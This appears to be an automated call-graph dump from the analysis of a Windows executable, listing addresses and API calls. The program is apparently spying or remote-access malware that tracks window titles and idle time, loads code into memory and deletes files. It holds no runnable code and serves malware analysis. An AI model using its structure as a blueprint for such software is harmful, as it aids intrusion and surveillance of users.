53698 404e40 SetEvent CloseHandle 53697->53698 53699 404e57 closesocket 53697->53699 53700 404ca8 53698->53700 53701 404e64 53699->53701 53700->53568 53702 404e7a 53701->53702 54310 4050e4 84 API calls 53701->54310 53704 404e8c WaitForSingleObject 53702->53704 53705 404ece SetEvent CloseHandle 53702->53705 54311 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53704->54311 53705->53700 53707 404e9b SetEvent WaitForSingleObject 54312 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53707->54312 53709 404eb3 SetEvent CloseHandle CloseHandle 53709->53705 53710->53674 53711->53677 53713 4129ec 53712->53713 53760 4041a2 53713->53760 53716 4020f6 28 API calls 53717 412a0e 53716->53717 53718 4020f6 28 API calls 53717->53718 53719 412a1d 53718->53719 53763 41beac 53719->53763 53722 412ace 53723 401e8d 11 API calls 53722->53723 53725 412ad7 53723->53725 53724 401e65 22 API calls 53726 412a3d 53724->53726 53727 401fd8 11 API calls 53725->53727 53728 4020f6 28 API calls 53726->53728 53730 412ae0 53727->53730 53729 412a48 53728->53729 53731 401e65 22 API calls 53729->53731 53732 401fd8 11 API calls 53730->53732 53733 412a53 53731->53733 53734 412ae8 53732->53734 53735 4020f6 28 API calls 53733->53735 53734->53690 53736 412a5e 53735->53736 53737 401e65 22 API calls 53736->53737 53738 412a69 53737->53738 53739 4020f6 28 API calls 53738->53739 53740 412a74 53739->53740 53741 401e65 22 API calls 53740->53741 53742 412a7f 53741->53742 53743 4020f6 28 API calls 53742->53743 53744 412a8a 53743->53744 53745 401e65 22 API calls 53744->53745 53746 412a95 53745->53746 53747 4020f6 28 API calls 53746->53747 53748 412aa0 53747->53748 53749 401e65 22 API calls 53748->53749 53750 412aae 53749->53750 53751 4020f6 28 API calls 53750->53751 53752 412ab9 53751->53752 53785 412aef GetModuleFileNameW 53752->53785 53755 404e26 99 API calls 53755->53722 53757 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53756->53757 53758 401fc9 53756->53758 53757->53690 54169 415b25 53757->54169 54168 4025e0 28 API calls 53758->54168 53932 40423a 53760->53932 53764 4020df 11 API calls 53763->53764 53773 41bebf 53764->53773 53765 401fd8 11 API calls 53766 41bf61 53765->53766 53768 401fd8 11 API calls 53766->53768 53767 41bf31 53769 4041a2 28 API calls 53767->53769 53771 41bf69 53768->53771 53772 41bf3d 53769->53772 53770 4041a2 28 API calls 53770->53773 53774 401fd8 11 API calls 53771->53774 53775 401fe2 28 API calls 53772->53775 53773->53767 53773->53770 53776 401fe2 28 API calls 53773->53776 53780 401fd8 11 API calls 53773->53780 53784 41bf2f 53773->53784 53938 41cec5 53773->53938 53777 412a26 53774->53777 53778 41bf46 53775->53778 53776->53773 53777->53722 53777->53724 53779 401fd8 11 API calls 53778->53779 53781 41bf4e 53779->53781 53780->53773 53782 41cec5 28 API calls 53781->53782 53782->53784 53784->53765 53786 4020df 11 API calls 53785->53786 53787 412b1a 53786->53787 53788 4020df 11 API calls 53787->53788 53789 412b26 53788->53789 53790 4020df 11 API calls 53789->53790 53812 412b32 53790->53812 53791 41ba09 43 API calls 53791->53812 53792 40da23 32 API calls 53792->53812 53793 401fd8 11 API calls 53793->53812 53794 40417e 28 API calls 53794->53812 53795 4042fc 79 API calls 53795->53812 53796 40431d 28 API calls 53796->53812 53797 412c58 Sleep 53797->53812 53798 403014 28 API calls 53798->53812 53799 4185a3 31 API calls 53799->53812 53800 412cfa Sleep 53800->53812 53801 401f09 11 API calls 53801->53812 53802 412d9c Sleep 53802->53812 53803 412dff DeleteFileW 53803->53812 53804 41c516 32 API calls 53804->53812 53805 412e36 DeleteFileW 53805->53812 53806 412e88 Sleep 53806->53812 53807 412e72 DeleteFileW 53807->53812 53808 412f01 53809 401f09 11 API calls 53808->53809 53810 412f0d 53809->53810 53811 401f09 11 API calls 53810->53811 53813 412f19 53811->53813 53812->53791 53812->53792 53812->53793 53812->53794 53812->53795 53812->53796 53812->53797 53812->53798 53812->53799 53812->53800 53812->53801 53812->53802 53812->53803 53812->53804 53812->53805 53812->53806 53812->53807 53812->53808 53815 412ecd Sleep 53812->53815 53814 401f09 11 API calls 53813->53814 53816 412f25 53814->53816 53981 401f09 53815->53981 53963 40b93f 53816->53963 53819 412f38 53820 4020f6 28 API calls 53819->53820 53822 412f58 53820->53822 53821 401f09 11 API calls 53823 412edd 53821->53823 53969 413268 53822->53969 53823->53812 53823->53821 53825 412eff 53823->53825 53825->53816 53827 401f09 11 API calls 53828 412f6f 53827->53828 53829 4130e3 53828->53829 53830 412f8f 53828->53830 53831 41bdaf 28 API calls 53829->53831 53984 41bdaf 53830->53984 53833 4130ec 53831->53833 53835 402f31 28 API calls 53833->53835 53837 413123 53835->53837 53840 402f10 28 API calls 53837->53840 53839 402f31 28 API calls 53842 412fe5 53839->53842 53841 413132 53840->53841 53843 402f10 28 API calls 53841->53843 53844 402f10 28 API calls 53842->53844 53845 41313e 53843->53845 53846 412ff4 53844->53846 53847 402f10 28 API calls 53845->53847 53848 402f10 28 API calls 53846->53848 53849 41314d 53847->53849 53850 413003 53848->53850 53851 402f10 28 API calls 53849->53851 53852 402f10 28 API calls 53850->53852 53853 41315c 53851->53853 53854 413012 53852->53854 53855 402f10 28 API calls 53853->53855 53856 402f10 28 API calls 53854->53856 53857 41316b 53855->53857 53858 413021 53856->53858 53859 402f10 28 API calls 53857->53859 53860 402f10 28 API calls 53858->53860 53861 41317a 53859->53861 53862 41302d 53860->53862 53863 402ea1 28 API calls 53861->53863 53864 402f10 28 API calls 53862->53864 53865 413184 53863->53865 53866 413039 53864->53866 53867 404aa1 61 API calls 53865->53867 53993 402ea1 53866->53993 53869 413191 53867->53869 53872 401fd8 11 API calls 53869->53872 53871 402f10 28 API calls 53874 413054 53871->53874 53873 41319d 53872->53873 53875 401fd8 11 API calls 53873->53875 53876 402ea1 28 API calls 53874->53876 53877 4131a9 53875->53877 53878 41305e 53876->53878 53879 401fd8 11 API calls 53877->53879 53880 404aa1 61 API calls 53878->53880 53881 4131b5 53879->53881 53882 41306b 53880->53882 53883 401fd8 11 API calls 53881->53883 53884 401fd8 11 API calls 53882->53884 53885 4131c1 53883->53885 53886 413074 53884->53886 53887 401fd8 11 API calls 53885->53887 53888 401fd8 11 API calls 53886->53888 53889 4131ca 53887->53889 53890 41307d 53888->53890 53891 401fd8 11 API calls 53889->53891 53892 401fd8 11 API calls 53890->53892 53893 4131d3 53891->53893 53894 413086 53892->53894 53895 401fd8 11 API calls 53893->53895 53896 401fd8 11 API calls 53894->53896 53897 4130d7 53895->53897 53898 41308f 53896->53898 53900 401fd8 11 API calls 53897->53900 53899 401fd8 11 API calls 53898->53899 53901 41309b 53899->53901 53903 4131e5 53900->53903 53902 401fd8 11 API calls 53901->53902 53905 4130a7 53902->53905 53904 401f09 11 API calls 53903->53904 53906 4131f1 53904->53906 53907 401fd8 11 API calls 53905->53907 53908 401fd8 11 API calls 53906->53908 53909 4130b3 53907->53909 53910 4131fd 53908->53910 53911 401fd8 11 API calls 53909->53911 53912 401fd8 11 API calls 53910->53912 53913 4130bf 53911->53913 53914 413209 53912->53914 53915 401fd8 11 API calls 53913->53915 53916 401fd8 11 API calls 53914->53916 53917 4130cb 53915->53917 53918 413215 53916->53918 53919 401fd8 11 API calls 53917->53919 53920 401fd8 11 API calls 53918->53920 53919->53897 53921 413221 53920->53921 53922 401fd8 11 API calls 53921->53922 53923 41322d 53922->53923 53924 401fd8 11 API calls 53923->53924 53925 413239 53924->53925 53926 401fd8 11 API calls 53925->53926 53927 413245 53926->53927 53928 401fd8 11 API calls 53927->53928 53929 413251 53928->53929 53930 401fd8 11 API calls 53929->53930 53931 412abe 53930->53931 53931->53755 53933 404243 53932->53933 53934 4023ce 11 API calls 53933->53934 53935 40424e 53934->53935 53936 402569 28 API calls 53935->53936 53937 4041b5 53936->53937 53937->53716 53939 41ced2 53938->53939 53940 41cf31 53939->53940 53944 41cee2 53939->53944 53941 41cf4b 53940->53941 53954 41d071 28 API calls 53940->53954 53943 41d1d7 28 API calls 53941->53943 53948 41cf2d 53943->53948 53946 41cf1a 53944->53946 53949 41d071 28 API calls 53944->53949 53950 41d1d7 53946->53950 53948->53773 53949->53946 53951 41d1e0 53950->53951 53955 41d283 53951->53955 53954->53941 53956 41d28c 53955->53956 53959 41d331 53956->53959 53961 41d33c 53959->53961 53960 41d1ea 53960->53948 53961->53960 53962 4020f6 28 API calls 53961->53962 53962->53960 53964 40b947 53963->53964 54002 402252 53964->54002 53966 40b952 54006 40b967 53966->54006 53968 40b961 53968->53819 53971 413277 53969->53971 53979 4132a6 53969->53979 53970 4132b5 54036 40417e 53970->54036 54032 411d2d 53971->54032 53976 401fd8 11 API calls 53978 412f63 53976->53978 53978->53827 53979->53970 54028 10001c5b 53979->54028 53982 402252 11 API calls 53981->53982 53983 401f12 53982->53983 53983->53823 53985 41bdbc 53984->53985 53986 4020b7 28 API calls 53985->53986 53987 412f9b 53986->53987 53988 41bc1f 53987->53988 54158 441ed1 53988->54158 53991 402093 28 API calls 53992 412fb5 53991->53992 53992->53839 53996 402eb0 53993->53996 53994 402ef2 53995 401fb0 28 API calls 53994->53995 54001 402ef0 53995->54001 53996->53994 53999 402ee7 53996->53999 53997 402055 11 API calls 53998 402f09 53997->53998 53998->53871 54167 403365 28 API calls 53999->54167 54001->53997 54003 40225c 54002->54003 54004 4022ac 54002->54004 54003->54004 54013 402779 11 API calls std::_Deallocate 54003->54013 54004->53966 54007 40b9a1 54006->54007 54008 40b973 54006->54008 54025 4028a4 22 API calls 54007->54025 54014 4027e6 54008->54014 54012 40b97d 54012->53968 54013->54004 54015 4027ef 54014->54015 54016 402851 54015->54016 54017 4027f9 54015->54017 54027 4028a4 22 API calls 54016->54027 54020 402802 54017->54020 54022 402815 54017->54022 54026 402aea 28 API calls __EH_prolog 54020->54026 54023 402813 54022->54023 54024 402252 11 API calls 54022->54024 54023->54012 54024->54023 54026->54023 54029 10001c6b ___scrt_fastfail 54028->54029 54042 100012ee 54029->54042 54031 10001c87 54031->53970 54084 411d39 54032->54084 54035 411fa2 22 API calls _Yarn 54035->53979 54037 404186 54036->54037 54038 402252 11 API calls 54037->54038 54039 404191 54038->54039 54137 4041bc 54039->54137 54043 10001324 ___scrt_fastfail 54042->54043 54044 100013b7 GetEnvironmentVariableW 54043->54044 54068 100010f1 54044->54068 54047 100010f1 57 API calls 54048 10001465 54047->54048 54049 100010f1 57 API calls 54048->54049 54050 10001479 54049->54050 54051 100010f1 57 API calls 54050->54051 54052 1000148d 54051->54052 54053 100010f1 57 API calls 54052->54053 54054 100014a1 54053->54054 54055 100010f1 57 API calls 54054->54055 54056 100014b5 lstrlenW 54055->54056 54057 100014d2 54056->54057 54058 100014d9 lstrlenW 54056->54058 54057->54031 54059 100010f1 57 API calls 54058->54059 54060 10001501 lstrlenW lstrcatW 54059->54060 54061 100010f1 57 API calls 54060->54061 54062 10001539 lstrlenW lstrcatW 54061->54062 54063 100010f1 57 API calls 54062->54063 54064 1000156b lstrlenW lstrcatW 54063->54064 54065 100010f1 57 API calls 54064->54065 54066 1000159d lstrlenW lstrcatW 54065->54066 54067 100010f1 57 API calls 54066->54067 54067->54057 54069 10001118 ___scrt_fastfail 54068->54069 54070 10001129 lstrlenW 54069->54070 54081 10002c40 54070->54081 54073 10001177 lstrlenW FindFirstFileW 54075 100011a0 54073->54075 54076 100011e1 54073->54076 54074 10001168 lstrlenW 54074->54073 54077 100011c7 FindNextFileW 54075->54077 54078 100011aa 54075->54078 54076->54047 54077->54075 54080 100011da FindClose 54077->54080 54078->54077 54083 10001000 57 API calls ___scrt_fastfail 54078->54083 54080->54076 54082 10001148 lstrcatW lstrlenW 54081->54082 54082->54073 54082->54074 54083->54078 54117 4117d7 54084->54117 54086 411d57 54087 411d6d SetLastError 54086->54087 54088 4117d7 SetLastError 54086->54088 54114 411d35 54086->54114 54087->54114 54089 411d8a 54088->54089 54089->54087 54091 411dac GetNativeSystemInfo 54089->54091 54089->54114 54092 411df2 54091->54092 54103 411dff SetLastError 54092->54103 54120 411cde VirtualAlloc 54092->54120 54095 411e22 54096 411e47 GetProcessHeap HeapAlloc 54095->54096 54130 411cde VirtualAlloc 54095->54130 54097 411e70 54096->54097 54098 411e5e 54096->54098 54102 4117d7 SetLastError 54097->54102 54131 411cf5 VirtualFree 54098->54131 54100 411e3a 54100->54096 54100->54103 54104 411eb9 54102->54104 54103->54114 54105 411f6b 54104->54105 54121 411cde VirtualAlloc 54104->54121 54132 4120b2 GetProcessHeap HeapFree 54105->54132 54108 411ed2 ctype 54122 4117ea SetLastError ctype ___scrt_get_show_window_mode 54108->54122 54110 411efe 54110->54105 54123 411b9a 26 API calls 54110->54123 54112 411f2b 54112->54105 54124 41198a 54112->54124 54114->54035 54115 411f36 54115->54105 54115->54114 54116 411f60 SetLastError 54115->54116 54116->54105 54118 4117e6 54117->54118 54119 4117db SetLastError 54117->54119 54118->54086 54119->54086 54120->54095 54121->54108 54122->54110 54123->54112 54126 4119b0 54124->54126 54125 4118ed VirtualProtect 54129 411aab 54125->54129 54128 411a99 54126->54128 54126->54129 54133 4118ed 54126->54133 54128->54125 54129->54115 54130->54100 54131->54103 54132->54114 54134 4118fe 54133->54134 54135 4118f6 54133->54135 54134->54135 54136 411971 VirtualProtect 54134->54136 54135->54126 54136->54135 54138 4041c8 54137->54138 54141 4041d9 54138->54141 54140 40419c 54140->53976 54142 4041e9 54141->54142 54143 404206 54142->54143 54144 4041ef 54142->54144 54145 4027e6 28 API calls 54143->54145 54148 404267 54144->54148 54147 404204 54145->54147 54147->54140 54149 402888 22 API calls 54148->54149 54150 40427b 54149->54150 54151 404290 54150->54151 54152 4042a5 54150->54152 54154 4042df 22 API calls 54151->54154 54153 4027e6 28 API calls 54152->54153 54157 4042a3 54153->54157 54155 404299 54154->54155 54156 402c48 22 API calls 54155->54156 54156->54157 54157->54147 54159 441edd 54158->54159 54162 441ccd 54159->54162 54161 41bc43 54161->53991 54163 441ce4 54162->54163 54165 441d1b _abort 54163->54165 54166 44062d 20 API calls _abort 54163->54166 54165->54161 54166->54165 54167->54001 54168->53757 54170 4020f6 28 API calls 54169->54170 54171 415b47 SetEvent 54170->54171 54172 415b5c 54171->54172 54173 4041a2 28 API calls 54172->54173 54174 415b76 54173->54174 54175 4020f6 28 API calls 54174->54175 54176 415b86 54175->54176 54177 4020f6 28 API calls 54176->54177 54178 415b98 54177->54178 54179 41beac 28 API calls 54178->54179 54180 415ba1 54179->54180 54181 415bc1 GetTickCount 54180->54181 54182 415d20 54180->54182 54246 415d11 54180->54246 54184 41bc1f 28 API calls 54181->54184 54182->54246 54247 415d34 54182->54247 54183 401e8d 11 API calls 54185 4170cd 54183->54185 54186 415bd2 54184->54186 54188 401fd8 11 API calls 54185->54188 54248 41bb77 GetLastInputInfo GetTickCount 54186->54248 54190 4170d9 54188->54190 54192 401fd8 11 API calls 54190->54192 54191 415bde 54194 41bc1f 28 API calls 54191->54194 54193 4170e5 54192->54193 54195 415be9 54194->54195 54249 41bb27 54195->54249 54198 41bdaf 28 API calls 54199 415c05 54198->54199 54200 401e65 22 API calls 54199->54200 54201 415c13 54200->54201 54202 402f31 28 API calls 54201->54202 54203 415c21 54202->54203 54204 402ea1 28 API calls 54203->54204 54205 415c30 54204->54205 54206 402f10 28 API calls 54205->54206 54207 415c3f 54206->54207 54208 402ea1 28 API calls 54207->54208 54209 415c4e 54208->54209 54210 402f10 28 API calls 54209->54210 54211 415c5a 54210->54211 54212 402ea1 28 API calls 54211->54212 54213 415c64 54212->54213 54214 404aa1 61 API calls 54213->54214 54215 415c73 54214->54215 54216 401fd8 11 API calls 54215->54216 54217 415c7c 54216->54217 54218 401fd8 11 API calls 54217->54218 54219 415c88 54218->54219 54220 401fd8 11 API calls 54219->54220 54221 415c94 54220->54221 54222 401fd8 11 API calls 54221->54222 54223 415ca0 54222->54223 54224 401fd8 11 API calls 54223->54224 54225 415cac 54224->54225 54226 401fd8 11 API calls 54225->54226 54227 415cb8 54226->54227 54228 401f09 11 API calls 54227->54228 54229 415cc1 54228->54229 54230 401fd8 11 API calls 54229->54230 54231 415cca 54230->54231 54232 401fd8 11 API calls 54231->54232 54233 415cd3 54232->54233 54234 401e65 22 API calls 54233->54234 54235 415cde 54234->54235 54254 43bb2c 54235->54254 54238 415cf0 54241 415d09 54238->54241 54242 415cfe 54238->54242 54239 415d16 54240 401e65 22 API calls 54239->54240 54240->54182 54259 404f51 54241->54259 54258 404ff4 82 API calls 54242->54258 54245 415d04 54245->54246 54246->54183 54274 4050e4 84 API calls 54247->54274 54248->54191 54275 436f10 54249->54275 54252 40417e 28 API calls 54253 415bf7 54252->54253 54253->54198 54255 43bb45 _strftime 54254->54255 54277 43ae83 54255->54277 54257 415ceb 54257->54238 54257->54239 54258->54245 54260 404f65 54259->54260 54261 404fea 54259->54261 54262 404f6e 54260->54262 54263 404fc0 CreateEventA CreateThread 54260->54263 54264 404f7d GetLocalTime 54260->54264 54261->54246 54262->54263 54263->54261 54306 405150 54263->54306 54265 41bc1f 28 API calls 54264->54265 54266 404f91 54265->54266 54305 4052fd 28 API calls 54266->54305 54274->54245 54276 41bb46 GetForegroundWindow GetWindowTextW 54275->54276 54276->54252 54293 43ba8a 54277->54293 54279 43aed0 54299 43a837 36 API calls 3 library calls 54279->54299 54281 43ae95 54281->54279 54282 43aeaa 54281->54282 54292 43aeaf _abort 54281->54292 54298 44062d 20 API calls _abort 54282->54298 54285 43aedc 54286 43af0b 54285->54286 54300 43bacf 40 API calls __Tolower 54285->54300 54288 43af77 54286->54288 54301 43ba36 20 API calls 2 library calls 54286->54301 54302 43ba36 20 API calls 2 library calls 54288->54302 54290 43b03e _strftime 54290->54292 54303 44062d 20 API calls _abort 54290->54303 54292->54257 54294 43baa2 54293->54294 54295 43ba8f 54293->54295 54294->54281 54304 44062d 20 API calls _abort 54295->54304 54297 43ba94 _abort 54297->54281 54298->54292 54299->54285 54300->54285 54301->54288 54302->54290 54303->54292 54304->54297 54309 40515c 102 API calls 54306->54309 54308 405159 54309->54308 54310->53702 54311->53707 54312->53709 54313 43bea8 54316 43beb4 _swprintf ___DestructExceptionObject 54313->54316 54314 43bec2 54329 44062d 20 API calls _abort 54314->54329 54316->54314 54317 43beec 54316->54317 54324 445909 EnterCriticalSection 54317->54324 54319 43bef7 54325 43bf98 54319->54325 54320 43bec7 ___DestructExceptionObject _abort 54324->54319 54326 43bfa6 54325->54326 54328 43bf02 54326->54328 54331 4497ec 37 API calls 2 library calls 54326->54331 54330 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 54328->54330 54329->54320 54330->54320 54331->54326 54332 434918 54333 434924 ___DestructExceptionObject 54332->54333 54359 434627 54333->54359 54335 43492b 54337 434954 54335->54337 54657 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54335->54657 54345 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54337->54345 54658 4442d2 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 54337->54658 54339 43496d 54341 434973 ___DestructExceptionObject 54339->54341 54659 444276 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 54339->54659 54342 4349f3 54370 434ba5 54342->54370 54345->54342 54660 443487 36 API calls 3 library calls 54345->54660 54352 434a15 54353 434a1f 54352->54353 54662 4434bf 28 API calls _abort 54352->54662 54355 434a28 54353->54355 54663 443462 28 API calls _abort 54353->54663 54664 43479e 13 API calls 2 library calls 54355->54664 54358 434a30 54358->54341 54360 434630 54359->54360 54665 434cb6 IsProcessorFeaturePresent 54360->54665 54362 43463c 54666 438fb1 10 API calls 4 library calls 54362->54666 54364 434641 54369 434645 54364->54369 54667 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54364->54667 54366 43464e 54367 43465c 54366->54367 54668 438fda 8 API calls 3 library calls 54366->54668 54367->54335 54369->54335 54371 436f10 ___scrt_get_show_window_mode 54370->54371 54372 434bb8 GetStartupInfoW 54371->54372 54373 4349f9 54372->54373 54374 444223 54373->54374 54669 44f0d9 54374->54669 54376 44422c 54378 434a02 54376->54378 54673 446895 36 API calls 54376->54673 54379 40ea00 54378->54379 54675 41cbe1 LoadLibraryA GetProcAddress 54379->54675 54381 40ea1c GetModuleFileNameW 54680 40f3fe 54381->54680 54383 40ea38 54384 4020f6 28 API calls 54383->54384 54385 40ea47 54384->54385 54386 4020f6 28 API calls 54385->54386 54387 40ea56 54386->54387 54388 41beac 28 API calls 54387->54388 54389 40ea5f 54388->54389 54695 40fb52 54389->54695 54391 40ea68 54392 401e8d 11 API calls 54391->54392 54393 40ea71 54392->54393 54394 40ea84 54393->54394 54395 40eace 54393->54395 54889 40fbee 118 API calls 54394->54889 54396 401e65 22 API calls 54395->54396 54398 40eade 54396->54398 54402 401e65 22 API calls 54398->54402 54399 40ea96 54400 401e65 22 API calls 54399->54400 54401 40eaa2 54400->54401 54890 410f72 36 API calls __EH_prolog 54401->54890 54403 40eafd 54402->54403 54404 40531e 28 API calls 54403->54404 54407 40eb0c 54404->54407 54406 40eab4 54891 40fb9f 78 API calls 54406->54891 54409 406383 28 API calls 54407->54409 54411 40eb18 54409->54411 54410 40eabd 54892 40f3eb 71 API calls 54410->54892 54412 401fe2 28 API calls 54411->54412 54414 40eb24 54412->54414 54415 401fd8 11 API calls 54414->54415 54416 40eb2d 54415->54416 54418 401fd8 11 API calls 54416->54418 54417 401fd8 11 API calls 54419 40ef36 54417->54419 54420 40eb36 54418->54420 54661 443396 GetModuleHandleW 54419->54661 54421 401e65 22 API calls 54420->54421 54422 40eb3f 54421->54422 54423 401fc0 28 API calls 54422->54423 54424 40eb4a 54423->54424 54425 401e65 22 API calls 54424->54425 54426 40eb63 54425->54426 54427 401e65 22 API calls 54426->54427 54428 40eb7e 54427->54428 54429 40ebe9 54428->54429 54893 406c59 54428->54893 54430 401e65 22 API calls 54429->54430 54435 40ebf6 54430->54435 54432 40ebab 54433 401fe2 28 API calls 54432->54433 54434 40ebb7 54433->54434 54437 401fd8 11 API calls 54434->54437 54436 40ec3d 54435->54436 54442 413584 3 API calls 54435->54442 54699 40d0a4 54436->54699 54438 40ebc0 54437->54438 54898 413584 RegOpenKeyExA 54438->54898 54440 40ec43 54441 40eac6 54440->54441 54702 41b354 54440->54702 54441->54417 54448 40ec21 54442->54448 54446 40ec5e 54449 40ecb1 54446->54449 54719 407751 54446->54719 54447 40f38a 54991 4139e4 30 API calls 54447->54991 54448->54436 54901 4139e4 30 API calls 54448->54901 54452 401e65 22 API calls 54449->54452 54455 40ecba 54452->54455 54454 40f3a0 54992 4124b0 65 API calls ___scrt_get_show_window_mode 54454->54992 54463 40ecc6 54455->54463 54464 40eccb 54455->54464 54458 40ec87 54461 401e65 22 API calls 54458->54461 54459 40ec7d 54902 407773 30 API calls 54459->54902 54473 40ec90 54461->54473 54462 40f3aa 54466 41bcef 28 API calls 54462->54466 54905 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 54463->54905 54469 401e65 22 API calls 54464->54469 54465 40ec82 54903 40729b 98 API calls 54465->54903 54470 40f3ba 54466->54470 54471 40ecd4 54469->54471 54791 413a5e RegOpenKeyExW 54470->54791 54723 41bcef 54471->54723 54473->54449 54477 40ecac 54473->54477 54474 40ecdf 54727 401f13 54474->54727 54904 40729b 98 API calls 54477->54904 54481 401f09 11 API calls 54483 40f3d7 54481->54483 54482 401f09 11 API calls 54484 40ecf3 54482->54484 54485 401f09 11 API calls 54483->54485 54486 401e65 22 API calls 54484->54486 54487 40f3e0 54485->54487 54489 40ecfc 54486->54489 54794 40dd7d 54487->54794 54492 401e65 22 API calls 54489->54492 54494 40ed16 54492->54494 54493 40f3ea 54495 401e65 22 API calls 54494->54495 54496 40ed30 54495->54496 54497 401e65 22 API calls 54496->54497 54498 40ed49 54497->54498 54499 40edb6 54498->54499 54501 401e65 22 API calls 54498->54501 54500 40edc5 54499->54500 54507 40ef41 ___scrt_get_show_window_mode 54499->54507 54502 40edce 54500->54502 54530 40ee4a ___scrt_get_show_window_mode 54500->54530 54505 40ed5e _wcslen 54501->54505 54503 401e65 22 API calls 54502->54503 54504 40edd7 54503->54504 54506 401e65 22 API calls 54504->54506 54505->54499 54508 401e65 22 API calls 54505->54508 54509 40ede9 54506->54509 54966 413733 RegOpenKeyExA 54507->54966 54510 40ed79 54508->54510 54512 401e65 22 API calls 54509->54512 54513 401e65 22 API calls 54510->54513 54514 40edfb 54512->54514 54515 40ed8e 54513->54515 54517 401e65 22 API calls 54514->54517 54906 40da6f 54515->54906 54516 40ef8c 54518 401e65 22 API calls 54516->54518 54519 40ee24 54517->54519 54520 40efb1 54518->54520 54524 401e65 22 API calls 54519->54524 54525 402093 28 API calls 54520->54525 54523 401f13 28 API calls 54526 40edad 54523->54526 54528 40ee35 54524->54528 54529 40efc3 54525->54529 54527 401f09 11 API calls 54526->54527 54527->54499 54964 40ce34 46 API calls _wcslen 54528->54964 54746 4137aa RegCreateKeyA 54529->54746 54736 413982 54530->54736 54534 40eede ctype 54539 401e65 22 API calls 54534->54539 54535 40ee45 54535->54530 54537 401e65 22 API calls 54538 40efe5 54537->54538 54541 43bb2c _strftime 40 API calls 54538->54541 54540 40eef5 54539->54540 54540->54516 54544 40ef09 54540->54544 54542 40eff2 54541->54542 54543 40effc 54542->54543 54545 40f01f 54542->54545 54969 41ce2c 88 API calls ___scrt_get_show_window_mode 54543->54969 54546 401e65 22 API calls 54544->54546 54550 402093 28 API calls 54545->54550 54548 40ef12 54546->54548 54551 41bcef 28 API calls 54548->54551 54549 40f003 CreateThread 54549->54545 55449 41d4ee 10 API calls 54549->55449 54552 40f034 54550->54552 54553 40ef1e 54551->54553 54555 402093 28 API calls 54552->54555 54965 40f4af 114 API calls 54553->54965 54556 40f043 54555->54556 54558 41b580 80 API calls 54556->54558 54557 40ef23 54557->54516 54559 40ef2a 54557->54559 54560 40f048 54558->54560 54559->54441 54561 401e65 22 API calls 54560->54561 54562 40f054 54561->54562 54563 401e65 22 API calls 54562->54563 54564 40f066 54563->54564 54565 401e65 22 API calls 54564->54565 54566 40f086 54565->54566 54567 43bb2c _strftime 40 API calls 54566->54567 54568 40f093 54567->54568 54569 401e65 22 API calls 54568->54569 54570 40f09e 54569->54570 54571 401e65 22 API calls 54570->54571 54572 40f0af 54571->54572 54573 401e65 22 API calls 54572->54573 54574 40f0c4 54573->54574 54575 401e65 22 API calls 54574->54575 54576 40f0d5 54575->54576 54577 40f0dc StrToIntA 54576->54577 54752 409e1f 54577->54752 54580 401e65 22 API calls 54581 40f0f7 54580->54581 54582 40f103 54581->54582 54583 40f13c 54581->54583 54970 43455e 54582->54970 54585 401e65 22 API calls 54583->54585 54587 40f14c 54585->54587 54590 40f194 54587->54590 54591 40f158 54587->54591 54588 401e65 22 API calls 54589 40f11f 54588->54589 54592 40f126 CreateThread 54589->54592 54594 401e65 22 API calls 54590->54594 54593 43455e new 22 API calls 54591->54593 54592->54583 55447 41a045 113 API calls 2 library calls 54592->55447 54595 40f161 54593->54595 54596 40f19d 54594->54596 54597 401e65 22 API calls 54595->54597 54599 40f207 54596->54599 54600 40f1a9 54596->54600 54598 40f173 54597->54598 54603 40f17a CreateThread 54598->54603 54601 401e65 22 API calls 54599->54601 54602 401e65 22 API calls 54600->54602 54604 40f210 54601->54604 54605 40f1b9 54602->54605 54603->54590 55452 41a045 113 API calls 2 library calls 54603->55452 54606 40f255 54604->54606 54607 40f21c 54604->54607 54608 401e65 22 API calls 54605->54608 54777 41b69e GetComputerNameExW GetUserNameW 54606->54777 54610 401e65 22 API calls 54607->54610 54611 40f1ce 54608->54611 54613 40f225 54610->54613 54977 40da23 54611->54977 54618 401e65 22 API calls 54613->54618 54614 401f13 28 API calls 54615 40f269 54614->54615 54617 401f09 11 API calls 54615->54617 54620 40f272 54617->54620 54621 40f23a 54618->54621 54623 40f27b SetProcessDEPPolicy 54620->54623 54624 40f27e CreateThread 54620->54624 54631 43bb2c _strftime 40 API calls 54621->54631 54622 401f13 28 API calls 54625 40f1ed 54622->54625 54623->54624 54626 40f293 CreateThread 54624->54626 54627 40f29f 54624->54627 55420 40f7e2 54624->55420 54628 401f09 11 API calls 54625->54628 54626->54627 55448 412132 146 API calls 54626->55448 54629 40f2b4 54627->54629 54630 40f2a8 CreateThread 54627->54630 54632 40f1f6 CreateThread 54628->54632 54634 40f307 54629->54634 54636 402093 28 API calls 54629->54636 54630->54629 55450 412716 38 API calls ___scrt_get_show_window_mode 54630->55450 54633 40f247 54631->54633 54632->54599 55451 401be9 50 API calls _strftime 54632->55451 54988 40c19d 7 API calls 54633->54988 54788 41353a RegOpenKeyExA 54634->54788 54637 40f2d7 54636->54637 54989 4052fd 28 API calls 54637->54989 54643 40f328 54644 41bcef 28 API calls 54643->54644 54646 40f338 54644->54646 54990 413656 31 API calls 54646->54990 54651 40f34e 54652 401f09 11 API calls 54651->54652 54655 40f359 54652->54655 54653 40f381 DeleteFileW 54654 40f388 54653->54654 54653->54655 54654->54462 54655->54462 54655->54653 54656 40f36f Sleep 54655->54656 54656->54655 54657->54335 54658->54339 54659->54345 54660->54342 54661->54352 54662->54353 54663->54355 54664->54358 54665->54362 54666->54364 54667->54366 54668->54369 54670 44f0eb 54669->54670 54671 44f0e2 54669->54671 54670->54376 54674 44efd8 49 API calls 4 library calls 54671->54674 54673->54376 54674->54670 54676 41cc20 LoadLibraryA GetProcAddress 54675->54676 54677 41cc10 GetModuleHandleA GetProcAddress 54675->54677 